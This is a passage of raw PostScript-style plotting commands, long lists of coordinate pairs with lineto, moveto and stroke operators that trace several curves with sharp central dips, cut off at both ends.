L +174.376 200.844 L +175.105 200.605 L +175.833 200.365 L +176.562 200.125 L +177.291 199.883 L +178.019 199.641 L +178.748 199.397 L +179.477 199.153 L +180.205 198.907 L +180.934 198.661 L +181.663 198.413 L +182.391 198.164 L +183.12 197.914 L +183.849 197.664 L +184.577 197.412 L +185.306 197.158 L +186.035 196.904 L +186.763 196.649 L +187.492 196.392 L +188.221 196.134 L +188.95 195.875 L +189.678 195.615 L +190.407 195.353 L +191.136 195.091 L +191.864 194.826 L +192.593 194.561 L +193.322 194.294 L +194.05 194.026 L +194.779 193.757 L +195.508 193.486 L +196.236 193.214 L +196.965 192.94 L +197.694 192.665 L +198.422 192.388 L +199.151 192.11 L +199.88 191.83 L +200.608 191.549 L +201.337 191.266 L +202.066 190.981 L +202.794 190.695 L +203.523 190.408 L +204.252 190.118 L +204.98 189.827 L +205.709 189.534 L +206.438 189.239 L +207.166 188.942 L +207.895 188.644 L +208.624 188.343 L +209.353 188.041 L +210.081 187.737 L +210.81 187.43 L +211.539 187.122 L +212.267 186.811 L +212.996 186.499 L +213.725 186.184 L +214.453 185.867 L +215.182 185.548 L +215.911 185.226 L +216.639 184.903 L +217.368 184.576 L +218.097 184.248 L +218.825 183.917 L +219.554 183.583 L +220.283 183.247 L +221.011 182.908 L +221.74 182.566 L +222.469 182.221 L +223.197 181.874 L +223.926 181.524 L +224.655 181.171 L +225.383 180.815 L +226.112 180.455 L +226.841 180.093 L +227.569 179.727 L +228.298 179.358 L +229.027 178.986 L +229.756 178.61 L +230.484 178.23 L +231.213 177.847 L +231.942 177.46 L +232.67 177.069 L +233.399 176.674 L +234.128 176.276 L +234.856 175.872 L +235.585 175.465 L +236.314 175.053 L +237.042 174.637 L +237.771 174.216 L +238.5 173.79 L +239.228 173.359 L +239.957 172.924 L +240.686 172.482 L +241.414 172.036 L +242.143 171.584 L +242.872 171.126 L +243.6 170.662 L +244.329 170.192 L +245.058 169.716 L +245.786 169.233 L +246.515 168.744 L +247.244 168.247 L +247.972 167.743 L +248.701 167.232 L +249.43 166.713 L +250.159 166.186 L +250.887 165.65 L +251.616 165.106 L +252.345 164.553 L +253.073 163.99 L +253.802 163.417 L +254.531 162.834 L +255.259 162.241 L +255.988 161.636 L +256.717 161.02 L +257.445 160.391 L +258.174 159.75 L +258.903 159.095 L +259.631 158.426 L +260.36 157.743 L +261.089 157.044 L +261.817 156.328 L +262.546 155.595 L +263.275 154.844 L +264.003 154.074 L +264.732 153.283 L +265.461 152.471 L +266.189 151.635 L +266.918 150.774 L +267.647 149.887 L +268.375 148.972 L +269.104 148.026 L +269.833 147.047 L +270.561 146.033 L +271.29 144.98 L +272.019 143.886 L +272.748 142.746 L +273.476 141.556 L +274.205 140.31 L +274.934 139.004 L +275.662 137.63 L +276.391 136.179 L +277.12 134.642 L +277.848 133.005 L +278.577 131.258 L +279.306 129.378 L +280.034 127.344 L +280.763 125.125 L +281.492 122.683 L +282.22 119.959 L +282.949 116.88 L +283.678 113.326 L +284.406 109.112 L +285.135 103.916 L +285.864 97.083 L +286.592 86.986 L +287.321 66.511 L +288.05 107.215 L +288.778 120.201 L +289.507 125.455 L +290.236 128.764 L +290.964 131.167 L +291.693 133.043 L +292.422 134.577 L +293.151 135.87 L +293.879 136.983 L +294.608 137.958 L +295.337 138.825 L +296.065 139.602 L +296.794 140.306 L +297.523 140.948 L +298.251 141.537 L +298.98 142.081 L +299.709 142.585 L +300.437 143.054 L +301.166 143.493 L +301.895 143.904 L +302.623 144.291 L +303.352 144.655 L +304.081 145 L +304.809 145.327 L +305.538 145.636 L +306.267 145.931 L +306.995 146.212 L +307.724 146.479 L +308.453 146.735 L +309.181 146.98 L +309.91 147.214 L +310.639 147.439 L +311.367 147.655 L 
+312.096 147.863 L +312.825 148.062 L +313.554 148.255 L +314.282 148.44 L +315.011 148.619 L +315.74 148.792 L +316.468 148.959 L +317.197 149.12 L +317.926 149.276 L +318.654 149.427 L +319.383 149.574 L +320.112 149.716 L +320.84 149.853 L +321.569 149.987 L +322.298 150.117 L +323.026 150.243 L +323.755 150.366 L +324.484 150.485 L +325.212 150.601 L +325.941 150.713 L +326.67 150.823 L +327.398 150.93 L +328.127 151.035 L +328.856 151.136 L +329.584 151.235 L +330.313 151.332 L +331.042 151.426 L +331.77 151.518 L +332.499 151.608 L +333.228 151.696 L +333.957 151.782 L +334.685 151.866 L +335.414 151.948 L +336.143 152.028 L +336.871 152.106 L +337.6 152.183 L +338.329 152.258 L +339.057 152.331 L +339.786 152.403 L +340.515 152.474 L +341.243 152.542 L +341.972 152.61 L +342.701 152.676 L +343.429 152.741 L +344.158 152.805 L +344.887 152.867 L +345.615 152.928 L +346.344 152.988 L +347.073 153.047 L +347.801 153.105 L +348.53 153.161 L +349.259 153.217 L +349.987 153.271 L +350.716 153.325 L +351.445 153.377 L +352.173 153.429 L +352.902 153.48 L +353.631 153.53 L +354.36 153.579 L +355.088 153.627 L +355.817 153.674 L +356.546 153.721 L +357.274 153.766 L +358.003 153.811 L +358.732 153.855 L +359.46 153.899 L +360.189 153.942 L +360.918 153.984 L +361.646 154.025 L +362.375 154.066 L +363.104 154.106 L +363.832 154.145 L +364.561 154.184 L +365.29 154.222 L +366.018 154.26 L +366.747 154.297 L +367.476 154.333 L +368.204 154.369 L +368.933 154.405 L +369.662 154.44 L +370.39 154.474 L +371.119 154.508 L +371.848 154.541 L +372.576 154.574 L +373.305 154.606 L +374.034 154.638 L +374.763 154.669 L +375.491 154.7 L +376.22 154.731 L +376.949 154.761 L +377.677 154.791 L +378.406 154.82 L +379.135 154.849 L +379.863 154.877 L +380.592 154.905 L +381.321 154.933 L +382.049 154.96 L +382.778 154.987 L +383.507 155.014 L +384.235 155.04 L +384.964 155.066 L +385.693 155.092 L +386.421 155.117 L +387.15 155.142 L +387.879 155.166 L +388.607 155.19 L +389.336 155.214 L +390.065 155.238 L +390.793 155.261 L +391.522 155.284 L +392.251 155.307 L +392.979 155.33 L +393.708 155.352 L +394.437 155.374 L +395.166 155.395 L +395.894 155.417 L +396.623 155.438 L +397.352 155.458 L +398.08 155.479 L +398.809 155.499 L +399.538 155.519 L +400.266 155.539 L +400.995 155.559 L +401.724 155.578 L +402.452 155.597 L +403.181 155.616 L +403.91 155.635 L +404.638 155.653 L +405.367 155.672 L +406.096 155.69 L +406.824 155.708 L +407.553 155.725 L +408.282 155.743 L +409.01 155.76 L +409.739 155.777 L +410.468 155.794 L +411.196 155.811 L +411.925 155.827 L +412.654 155.843 L +413.382 155.859 L +414.111 155.875 L +414.84 155.891 L +415.568 155.907 L +416.297 155.922 L +417.026 155.937 L +417.755 155.952 L +418.483 155.967 L +419.212 155.982 L +419.941 155.997 L +420.669 156.011 L +421.398 156.025 L +422.127 156.04 L +422.855 156.054 L +423.584 156.067 L +424.313 156.081 L +425.041 156.095 L +425.77 156.108 L +426.499 156.121 L +427.227 156.135 L +427.956 156.148 L +428.685 156.16 L +429.413 156.173 L +430.142 156.186 L +430.871 156.198 L +431.599 156.211 L +432.328 156.223 L +433.057 156.235 L +433.785 156.247 L +434.514 156.259 L +435.243 156.271 L +435.971 156.282 L +436.7 156.294 L +437.429 156.305 L +438.158 156.316 L +438.886 156.328 L +439.615 156.339 L +440.344 156.35 L +441.072 156.36 L +441.801 156.371 L +442.53 156.382 L +s +78.19 227.244 m +78.919 227.062 L +79.648 226.879 L +80.376 226.696 L +81.105 226.513 L +81.834 226.329 L +82.562 226.144 L +83.291 225.96 L +84.02 225.774 L +84.749 
225.589 L +85.477 225.403 L +86.206 225.216 L +86.935 225.029 L +87.663 224.842 L +88.392 224.654 L +89.121 224.465 L +89.849 224.277 L +90.578 224.088 L +91.307 223.898 L +92.035 223.708 L +92.764 223.518 L +93.493 223.327 L +94.221 223.135 L +94.95 222.944 L +95.679 222.751 L +96.407 222.559 L +97.136 222.366 L +97.865 222.172 L +98.593 221.978 L +99.322 221.783 L +100.051 221.589 L +100.779 221.393 L +101.508 221.197 L +102.237 221.001 L +102.965 220.804 L +103.694 220.607 L +104.423 220.409 L +105.152 220.211 L +105.88 220.013 L +106.609 219.813 L +107.338 219.614 L +108.066 219.414 L +108.795 219.213 L +109.524 219.012 L +110.252 218.811 L +110.981 218.609 L +111.71 218.406 L +112.438 218.203 L +113.167 217.999 L +113.896 217.795 L +114.624 217.591 L +115.353 217.386 L +116.082 217.18 L +116.81 216.974 L +117.539 216.767 L +118.268 216.56 L +118.996 216.352 L +119.725 216.144 L +120.454 215.935 L +121.182 215.726 L +121.911 215.516 L +122.64 215.305 L +123.368 215.094 L +124.097 214.883 L +124.826 214.67 L +125.554 214.458 L +126.283 214.244 L +127.012 214.03 L +127.741 213.816 L +128.469 213.6 L +129.198 213.385 L +129.927 213.168 L +130.655 212.951 L +131.384 212.733 L +132.113 212.515 L +132.841 212.296 L +133.57 212.076 L +134.299 211.856 L +135.027 211.635 L +135.756 211.413 L +136.485 211.191 L +137.213 210.968 L +137.942 210.744 L +138.671 210.52 L +139.399 210.294 L +140.128 210.068 L +140.857 209.842 L +141.585 209.614 L +142.314 209.386 L +143.043 209.157 L +143.771 208.927 L +144.5 208.697 L +145.229 208.466 L +145.957 208.234 L +146.686 208.001 L +147.415 207.767 L +148.144 207.532 L +148.872 207.297 L +149.601 207.06 L +150.33 206.823 L +151.058 206.585 L +151.787 206.346 L +152.516 206.106 L +153.244 205.865 L +153.973 205.623 L +154.702 205.381 L +155.43 205.137 L +156.159 204.892 L +156.888 204.646 L +157.616 204.4 L +158.345 204.152 L +159.074 203.903 L +159.802 203.653 L +160.531 203.402 L +161.26 203.15 L +161.988 202.897 L +162.717 202.643 L +163.446 202.387 L +164.174 202.131 L +164.903 201.873 L +165.632 201.614 L +166.36 201.354 L +167.089 201.092 L +167.818 200.83 L +168.547 200.565 L +169.275 200.3 L +170.004 200.033 L +170.733 199.765 L +171.461 199.496 L +172.19 199.225 L +172.919 198.953 L +173.647 198.68 L +174.376 198.405 L +175.105 198.128 L +175.833 197.85 L +176.562 197.57 L +177.291 197.289 L +178.019 197.006 L +178.748 196.722 L +179.477 196.435 L +180.205 196.148 L +180.934 195.858 L +181.663 195.567 L +182.391 195.274 L +183.12 194.979 L +183.849 194.682 L +184.577 194.383 L +185.306 194.083 L +186.035 193.78 L +186.763 193.475 L +187.492 193.169 L +188.221 192.86 L +188.95 192.549 L +189.678 192.236 L +190.407 191.921 L +191.136 191.603 L +191.864 191.284 L +192.593 190.961 L +193.322 190.637 L +194.05 190.31 L +194.779 189.98 L +195.508 189.648 L +196.236 189.313 L +196.965 188.976 L +197.694 188.635 L +198.422 188.292 L +199.151 187.946 L +199.88 187.598 L +200.608 187.246 L +201.337 186.891 L +202.066 186.533 L +202.794 186.171 L +203.523 185.807 L +204.252 185.438 L +204.98 185.067 L +205.709 184.692 L +206.438 184.313 L +207.166 183.93 L +207.895 183.544 L +208.624 183.153 L +209.353 182.759 L +210.081 182.36 L +210.81 181.957 L +211.539 181.549 L +212.267 181.137 L +212.996 180.72 L +213.725 180.299 L +214.453 179.872 L +215.182 179.44 L +215.911 179.003 L +216.639 178.56 L +217.368 178.112 L +218.097 177.657 L +218.825 177.197 L +219.554 176.73 L +220.283 176.257 L +221.011 175.777 L +221.74 175.29 L +222.469 174.796 L +223.197 174.295 L 
+223.926 173.785 L +224.655 173.268 L +225.383 172.742 L +226.112 172.207 L +226.841 171.662 L +227.569 171.109 L +228.298 170.546 L +229.027 169.971 L +229.756 169.387 L +230.484 168.79 L +231.213 168.182 L +231.942 167.561 L +232.67 166.927 L +233.399 166.28 L +234.128 165.617 L +234.856 164.94 L +235.585 164.246 L +236.314 163.535 L +237.042 162.806 L +237.771 162.058 L +238.5 161.289 L +239.228 160.499 L +239.957 159.686 L +240.686 158.848 L +241.414 157.985 L +242.143 157.093 L +242.872 156.17 L +243.6 155.216 L +244.329 154.226 L +245.058 153.198 L +245.786 152.13 L +246.515 151.016 L +247.244 149.854 L +247.972 148.638 L +248.701 95.265 L +249.43 93.925 L +250.159 92.513 L +250.887 91.021 L +251.616 89.437 L +252.345 87.751 L +253.073 85.948 L +253.802 84.008 L +254.531 81.914 L +255.259 79.635 L +255.988 77.137 L +256.717 74.37 L +257.445 71.271 L +258.174 67.749 L +258.903 63.665 L +259.631 58.799 L +260.36 52.774 L +261.089 44.836 L +261.817 33.16 L +262.546 10.25 L +263.275 102.86 L +264.003 118.171 L +264.732 124.159 L +265.461 127.877 L +266.189 130.553 L +266.918 132.626 L +267.647 134.311 L +268.375 135.722 L +269.104 136.932 L +269.833 137.986 L +270.561 138.919 L +271.29 139.753 L +272.019 140.505 L +272.748 141.189 L +273.476 141.814 L +274.205 142.389 L +274.934 142.921 L +275.662 143.415 L +276.391 143.875 L +277.12 144.305 L +277.848 144.709 L +278.577 145.088 L +279.306 145.446 L +280.034 145.784 L +280.763 146.105 L +281.492 146.409 L +282.22 146.698 L +282.949 146.973 L +283.678 147.236 L +284.406 147.486 L +285.135 147.726 L +285.864 147.955 L +286.592 148.175 L +287.321 148.386 L +288.05 148.589 L +288.778 148.784 L +289.507 148.972 L +290.236 149.152 L +290.964 149.327 L +291.693 149.495 L +292.422 149.657 L +293.151 149.814 L +293.879 149.965 L +294.608 150.112 L +295.337 150.254 L +296.065 150.392 L +296.794 150.525 L +297.523 150.654 L +298.251 150.78 L +298.98 150.901 L +299.709 151.02 L +300.437 151.135 L +301.166 151.246 L +301.895 151.355 L +302.623 151.46 L +303.352 151.563 L +304.081 151.663 L +304.809 151.761 L +305.538 151.856 L +306.267 151.949 L +306.995 152.039 L +307.724 152.127 L +308.453 152.213 L +309.181 152.297 L +309.91 152.379 L +310.639 152.459 L +311.367 152.537 L +312.096 152.613 L +312.825 152.688 L +313.554 152.761 L +314.282 152.832 L +315.011 152.902 L +315.74 152.97 L +316.468 153.037 L +317.197 153.102 L +317.926 153.166 L +318.654 153.228 L +319.383 153.29 L +320.112 153.35 L +320.84 153.409 L +321.569 153.466 L +322.298 153.523 L +323.026 153.578 L +323.755 153.633 L +324.484 153.686 L +325.212 153.738 L +325.941 153.789 L +326.67 153.84 L +327.398 153.889 L +328.127 153.937 L +328.856 153.985 L +329.584 154.032 L +330.313 154.078 L +331.042 154.123 L +331.77 154.167 L +332.499 154.21 L +333.228 154.253 L +333.957 154.295 L +334.685 154.336 L +335.414 154.376 L +336.143 154.416 L +336.871 154.455 L +337.6 154.494 L +338.329 154.532 L +339.057 154.569 L +339.786 154.606 L +340.515 154.642 L +341.243 154.677 L +341.972 154.712 L +342.701 154.746 L +343.429 154.78 L +344.158 154.813 L +344.887 154.846 L +345.615 154.878 L +346.344 154.91 L +347.073 154.941 L +347.801 154.972 L +348.53 155.002 L +349.259 155.032 L +349.987 155.061 L +350.716 155.09 L +351.445 155.118 L +352.173 155.146 L +352.902 155.174 L +353.631 155.201 L +354.36 155.228 L +355.088 155.255 L +355.817 155.281 L +356.546 155.306 L +357.274 155.332 L +358.003 155.357 L +358.732 155.381 L +359.46 155.406 L +360.189 155.43 L +360.918 155.453 L +361.646 155.476 L 
+362.375 155.499 L +363.104 155.522 L +363.832 155.544 L +364.561 155.567 L +365.29 155.588 L +366.018 155.61 L +366.747 155.631 L +367.476 155.652 L +368.204 155.672 L +368.933 155.693 L +369.662 155.713 L +370.39 155.733 L +371.119 155.752 L +371.848 155.772 L +372.576 155.791 L +373.305 155.81 L +374.034 155.828 L +374.763 155.847 L +375.491 155.865 L +376.22 155.883 L +376.949 155.9 L +377.677 155.918 L +378.406 155.935 L +379.135 155.952 L +379.863 155.969 L +380.592 155.986 L +381.321 156.002 L +382.049 156.018 L +382.778 156.034 L +383.507 156.05 L +384.235 156.066 L +384.964 156.081 L +385.693 156.097 L +386.421 156.112 L +387.15 156.127 L +387.879 156.141 L +388.607 156.156 L +389.336 156.171 L +390.065 156.185 L +390.793 156.199 L +391.522 156.213 L +392.251 156.227 L +392.979 156.24 L +393.708 156.254 L +394.437 156.267 L +395.166 156.28 L +395.894 156.293 L +396.623 156.306 L +397.352 156.319 L +398.08 156.331 L +398.809 156.344 L +399.538 156.356 L +400.266 156.368 L +400.995 156.38 L +401.724 156.392 L +402.452 156.404 L +403.181 156.416 L +403.91 156.427 L +404.638 156.439 L +405.367 156.45 L +406.096 156.461 L +406.824 156.472 L +407.553 156.483 L +408.282 156.494 L +409.01 156.505 L +409.739 156.515 L +410.468 156.526 L +411.196 156.536 L +411.925 156.546 L +412.654 156.557 L +413.382 156.567 L +414.111 156.577 L +414.84 156.587 L +415.568 156.596 L +416.297 156.606 L +417.026 156.616 L +417.755 156.625 L +418.483 156.634 L +419.212 156.644 L +419.941 156.653 L +420.669 156.662 L +421.398 156.671 L +422.127 156.68 L +422.855 156.689 L +423.584 156.697 L +424.313 156.706 L +425.041 156.715 L +425.77 156.723 L +426.499 156.732 L +427.227 156.74 L +427.956 156.748 L +428.685 156.756 L +429.413 156.764 L +430.142 156.772 L +430.871 156.78 L +431.599 156.788 L +432.328 156.796 L +433.057 156.804 L +433.785 156.811 L +434.514 156.819 L +435.243 156.826 L +435.971 156.834 L +436.7 156.841 L +437.429 156.849 L +438.158 156.856 L +438.886 156.863 L +439.615 156.87 L +440.344 156.877 L +441.072 156.884 L +441.801 156.891 L +442.53 156.898 L +s +78.19 227.796 m +78.555 227.699 L +78.919 227.602 L +79.283 227.504 L +79.648 227.407 L +80.012 227.309 L +80.376 227.211 L +80.741 227.113 L +81.105 227.016 L +81.469 226.917 L +81.834 226.819 L +82.198 226.721 L +82.562 226.622 L +82.927 226.524 L +83.291 226.425 L +83.655 226.327 L +84.02 226.228 L +84.384 226.129 L +84.749 226.03 L +85.113 225.93 L +85.477 225.831 L +85.842 225.732 L +86.206 225.632 L +86.57 225.532 L +86.935 225.433 L +87.299 225.333 L +87.663 225.233 L +88.028 225.133 L +88.392 225.032 L +88.756 224.932 L +89.121 224.832 L +89.485 224.731 L +89.849 224.63 L +90.214 224.53 L +90.578 224.429 L +90.942 224.328 L +91.307 224.227 L +91.671 224.125 L +92.035 224.024 L +92.4 223.923 L +92.764 223.821 L +93.128 223.719 L +93.493 223.618 L +93.857 223.516 L +94.221 223.414 L +94.586 223.311 L +94.95 223.209 L +95.314 223.107 L +95.679 223.004 L +96.043 222.902 L +96.407 222.799 L +96.772 222.696 L +97.136 222.593 L +97.5 222.49 L +97.865 222.387 L +98.229 222.284 L +98.593 222.18 L +98.958 222.077 L +99.322 221.973 L +99.686 221.869 L +100.051 221.765 L +100.415 221.661 L +100.779 221.557 L +101.144 221.453 L +101.508 221.349 L +101.872 221.244 L +102.237 221.14 L +102.601 221.035 L +102.965 220.93 L +103.33 220.825 L +103.694 220.72 L +104.058 220.615 L +104.423 220.51 L +104.787 220.404 L +105.152 220.299 L +105.516 220.193 L +105.88 220.087 L +106.245 219.981 L +106.609 219.875 L +106.973 219.769 L +107.338 219.663 L +107.702 
219.556 L +108.066 219.45 L +108.431 219.343 L +108.795 219.236 L +109.159 219.129 L +109.524 219.022 L +109.888 218.915 L +110.252 218.808 L +110.617 218.7 L +110.981 218.593 L +111.345 218.485 L +111.71 218.377 L +112.074 218.269 L +112.438 218.161 L +112.803 218.053 L +113.167 217.945 L +113.531 217.836 L +113.896 217.727 L +114.26 217.619 L +114.624 217.51 L +114.989 217.401 L +115.353 217.291 L +115.717 217.182 L +116.082 217.073 L +116.446 216.963 L +116.81 216.853 L +117.175 216.743 L +117.539 216.633 L +117.903 216.523 L +118.268 216.413 L +118.632 216.303 L +118.996 216.192 L +119.361 216.081 L +119.725 215.97 L +120.089 215.859 L +120.454 215.748 L +120.818 215.637 L +121.182 215.525 L +121.547 215.414 L +121.911 215.302 L +122.275 215.19 L +122.64 215.078 L +123.004 214.965 L +123.368 214.853 L +123.733 214.74 L +124.097 214.628 L +124.461 214.515 L +124.826 214.402 L +125.19 214.288 L +125.554 214.175 L +125.919 214.061 L +126.283 213.948 L +126.648 213.834 L +127.012 213.72 L +127.376 213.605 L +127.741 213.491 L +128.105 213.376 L +128.469 213.262 L +128.834 213.147 L +129.198 213.032 L +129.562 212.916 L +129.927 212.801 L +130.291 212.685 L +130.655 212.57 L +131.02 212.454 L +131.384 212.337 L +131.748 212.221 L +132.113 212.105 L +132.477 211.988 L +132.841 211.871 L +133.206 211.754 L +133.57 211.636 L +133.934 211.519 L +134.299 211.401 L +134.663 211.283 L +135.027 211.165 L +135.392 211.047 L +135.756 210.928 L +136.12 210.81 L +136.485 210.691 L +136.849 210.572 L +137.213 210.452 L +137.578 210.332 L +137.942 210.213 L +138.306 210.093 L +138.671 209.973 L +139.035 209.852 L +139.399 209.732 L +139.764 209.611 L +140.128 209.49 L +140.492 209.368 L +140.857 209.247 L +141.221 209.125 L +141.585 209.003 L +141.95 208.881 L +142.314 208.758 L +142.678 208.635 L +143.043 208.513 L +143.407 208.389 L +143.771 208.266 L +144.136 208.142 L +144.5 208.018 L +144.864 207.894 L +145.229 207.77 L +145.593 207.645 L +145.957 207.52 L +146.322 207.395 L +146.686 207.269 L +147.051 207.143 L +147.415 207.017 L +147.779 206.891 L +148.144 206.764 L +148.508 206.637 L +148.872 206.51 L +149.237 206.383 L +149.601 206.255 L +149.965 206.127 L +150.33 205.999 L +150.694 205.87 L +151.058 205.741 L +151.423 205.612 L +151.787 205.483 L +152.151 205.353 L +152.516 205.223 L +152.88 205.092 L +153.244 204.962 L +153.609 204.831 L +153.973 204.699 L +154.337 204.567 L +154.702 204.435 L +155.066 204.303 L +155.43 204.17 L +155.795 204.037 L +156.159 203.904 L +156.523 203.77 L +156.888 203.636 L +157.252 203.502 L +157.616 203.367 L +157.981 203.232 L +158.345 203.096 L +158.709 202.961 L +159.074 202.824 L +159.438 202.688 L +159.802 202.551 L +160.167 202.414 L +160.531 202.276 L +160.895 202.138 L +161.26 201.999 L +161.624 201.86 L +161.988 201.721 L +162.353 201.581 L +162.717 201.441 L +163.081 201.301 L +163.446 201.16 L +163.81 201.018 L +164.174 200.877 L +164.539 200.735 L +164.903 200.592 L +165.267 200.449 L +165.632 200.305 L +165.996 200.161 L +166.36 200.017 L +166.725 199.872 L +167.089 199.727 L +167.454 199.581 L +167.818 199.435 L +168.182 199.288 L +168.547 199.141 L +168.911 198.993 L +169.275 198.845 L +169.64 198.696 L +170.004 198.547 L +170.368 198.397 L +170.733 198.247 L +171.097 198.097 L +171.461 197.945 L +171.826 197.793 L +172.19 197.641 L +172.554 197.488 L +172.919 197.335 L +173.283 197.181 L +173.647 197.026 L +174.012 196.871 L +174.376 196.716 L +174.74 196.559 L +175.105 196.403 L +175.469 196.245 L +175.833 196.087 L +176.198 195.929 L +176.562 
195.77 L +176.926 195.61 L +177.291 195.449 L +177.655 195.288 L +178.019 195.126 L +178.384 194.964 L +178.748 194.801 L +179.112 194.637 L +179.477 194.473 L +179.841 194.308 L +180.205 194.142 L +180.57 193.976 L +180.934 193.809 L +181.298 193.641 L +181.663 193.472 L +182.027 193.304 L +182.391 193.134 L +182.756 192.963 L +183.12 192.791 L +183.484 192.62 L +183.849 192.447 L +184.213 192.273 L +184.577 192.098 L +184.942 191.923 L +185.306 191.747 L +185.67 191.57 L +186.035 191.392 L +186.399 191.214 L +186.763 191.035 L +187.128 190.854 L +187.492 190.673 L +187.856 190.491 L +188.221 190.309 L +188.585 190.125 L +188.95 189.94 L +189.314 189.755 L +189.678 189.568 L +190.043 189.381 L +190.407 189.192 L +190.771 189.003 L +191.136 188.813 L +191.5 188.622 L +191.864 188.429 L +192.229 188.236 L +192.593 188.042 L +192.957 187.847 L +193.322 187.65 L +193.686 187.453 L +194.05 187.254 L +194.415 187.054 L +194.779 186.854 L +195.143 186.652 L +195.508 186.449 L +195.872 186.244 L +196.236 186.039 L +196.601 185.832 L +196.965 185.625 L +197.329 185.415 L +197.694 185.205 L +198.058 184.994 L +198.422 184.781 L +198.787 184.567 L +199.151 184.351 L +199.515 184.134 L +199.88 131.817 L +200.244 131.597 L +200.608 131.376 L +200.973 131.153 L +201.337 130.93 L +201.701 130.704 L +202.066 130.477 L +202.43 130.249 L +202.794 130.019 L +203.159 129.787 L +203.523 129.554 L +203.887 129.318 L +204.252 129.082 L +204.616 128.844 L +204.98 128.604 L +205.345 128.362 L +205.709 128.118 L +206.073 127.873 L +206.438 127.625 L +206.802 127.376 L +207.166 127.125 L +207.531 126.872 L +207.895 126.616 L +208.259 126.358 L +208.624 126.099 L +208.988 125.837 L +209.353 125.573 L +209.717 125.307 L +210.081 125.038 L +210.446 124.767 L +210.81 124.494 L +211.174 124.217 L +211.539 123.939 L +211.903 123.657 L +212.267 123.373 L +212.632 123.086 L +212.996 122.797 L +213.36 122.504 L +213.725 122.208 L +214.089 121.91 L +214.453 121.608 L +214.818 121.302 L +215.182 120.994 L +215.546 120.681 L +215.911 120.366 L +216.275 120.046 L +216.639 119.723 L +217.004 119.395 L +217.368 119.064 L +217.732 118.728 L +218.097 118.389 L +218.461 118.044 L +218.825 117.695 L +219.19 117.34 L +219.554 116.982 L +219.918 116.617 L +220.283 116.248 L +220.647 115.872 L +221.011 115.491 L +221.376 115.103 L +221.74 114.71 L +222.104 114.31 L +222.469 113.903 L +222.833 113.488 L +223.197 113.067 L +223.562 112.637 L +223.926 112.199 L +224.29 111.753 L +224.655 111.297 L +225.019 110.833 L +225.383 110.358 L +225.748 109.874 L +226.112 109.378 L +226.476 108.871 L +226.841 108.353 L +227.205 107.821 L +227.569 107.276 L +227.934 106.717 L +228.298 106.144 L +228.662 105.556 L +229.027 104.951 L +229.391 104.329 L +229.756 103.689 L +230.12 103.031 L +230.484 102.352 L +230.849 101.653 L +231.213 100.932 L +231.577 100.19 L +231.942 99.426 L +232.306 98.638 L +232.67 97.827 L +233.035 96.995 L +233.399 96.143 L +233.763 95.275 L +234.128 94.395 L +234.492 93.515 L +234.856 92.647 L +235.221 91.816 L +235.585 91.055 L +235.949 90.419 L +236.314 89.987 L +236.678 89.872 L +237.042 90.228 L +237.407 91.227 L +237.771 93.008 L +238.135 95.595 L +238.5 98.813 L +238.864 102.357 L +239.228 105.928 L +239.593 109.305 L +239.957 112.388 L +240.321 115.15 L +240.686 117.611 L +241.05 119.793 L +241.414 121.734 L +241.779 123.473 L +242.143 125.035 L +242.507 126.442 L +242.872 127.722 L +243.236 128.889 L +243.6 129.959 L +243.965 130.941 L +244.329 131.852 L +244.693 132.693 L +245.058 133.477 L +245.422 134.21 L +245.786 
134.895 L +246.151 135.537 L +246.515 136.14 L +246.879 136.711 L +247.244 137.249 L +247.608 137.759 L +247.972 138.243 L +248.337 138.702 L +248.701 139.14 L +249.065 139.557 L +249.43 139.955 L +249.794 140.335 L +250.159 140.699 L +250.523 141.048 L +250.887 141.382 L +251.252 141.704 L +251.616 142.013 L +251.98 142.31 L +252.345 142.596 L +252.709 142.871 L +253.073 143.138 L +253.438 143.394 L +253.802 143.643 L +254.166 143.882 L +254.531 144.115 L +254.895 144.339 L +255.259 144.557 L +255.624 144.768 L +255.988 144.972 L +256.352 145.171 L +256.717 145.364 L +257.081 145.551 L +257.445 145.733 L +257.81 145.91 L +258.174 146.082 L +258.538 146.25 L +258.903 146.413 L +259.267 146.572 L +259.631 146.727 L +259.996 146.878 L +260.36 147.025 L +260.724 147.169 L +261.089 147.309 L +261.453 147.446 L +261.817 147.579 L +262.182 147.71 L +262.546 147.837 L +262.91 147.962 L +263.275 148.084 L +263.639 148.203 L +264.003 148.32 L +264.368 148.434 L +264.732 148.546 L +265.096 148.655 L +265.461 148.763 L +265.825 148.868 L +266.189 148.97 L +266.554 149.071 L +266.918 149.17 L +267.282 149.267 L +267.647 149.362 L +268.011 149.455 L +268.375 149.547 L +268.74 149.636 L +269.104 149.724 L +269.468 149.811 L +269.833 149.896 L +270.197 149.979 L +270.561 150.061 L +270.926 150.141 L +271.29 150.22 L +271.655 150.298 L +272.019 150.374 L +272.383 150.449 L +272.748 150.523 L +273.112 150.595 L +273.476 150.667 L +273.841 150.737 L +274.205 150.806 L +274.569 150.874 L +274.934 150.941 L +275.298 151.006 L +275.662 151.071 L +276.027 151.135 L +276.391 151.198 L +276.755 151.259 L +277.12 151.32 L +277.484 151.38 L +277.848 151.439 L +278.213 151.497 L +278.577 151.554 L +278.941 151.611 L +279.306 151.666 L +279.67 151.721 L +280.034 151.775 L +280.399 151.828 L +280.763 151.881 L +281.127 151.932 L +281.492 151.983 L +281.856 152.034 L +282.22 152.083 L +282.585 152.132 L +282.949 152.181 L +283.313 152.228 L +283.678 152.275 L +284.042 152.321 L +284.406 152.367 L +284.771 152.412 L +285.135 152.457 L +285.499 152.501 L +285.864 152.544 L +286.228 152.587 L +286.592 152.63 L +286.957 152.671 L +287.321 152.713 L +287.685 152.753 L +288.05 152.794 L +288.414 152.833 L +288.778 152.872 L +289.143 152.911 L +289.507 152.949 L +289.871 152.987 L +290.236 153.025 L +290.6 153.062 L +290.964 153.098 L +291.329 153.134 L +291.693 153.17 L +292.058 153.205 L +292.422 153.24 L +292.786 153.274 L +293.151 153.308 L +293.515 153.342 L +293.879 153.375 L +294.244 153.408 L +294.608 153.44 L +294.972 153.473 L +295.337 153.504 L +295.701 153.536 L +296.065 153.567 L +296.43 153.597 L +296.794 153.628 L +297.158 153.658 L +297.523 153.688 L +297.887 153.717 L +298.251 153.746 L +298.616 153.775 L +298.98 153.803 L +299.344 153.832 L +299.709 153.86 L +300.073 153.887 L +300.437 153.914 L +300.802 153.941 L +301.166 153.968 L +301.53 153.995 L +301.895 154.021 L +302.259 154.047 L +302.623 154.072 L +302.988 154.098 L +303.352 154.123 L +303.716 154.148 L +304.081 154.173 L +304.445 154.197 L +304.809 154.221 L +305.174 154.245 L +305.538 154.269 L +305.902 154.292 L +306.267 154.315 L +306.631 154.338 L +306.995 